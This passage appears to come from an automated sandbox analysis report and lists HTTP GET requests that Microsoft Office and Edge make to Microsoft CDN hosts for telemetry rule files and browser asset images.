                      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
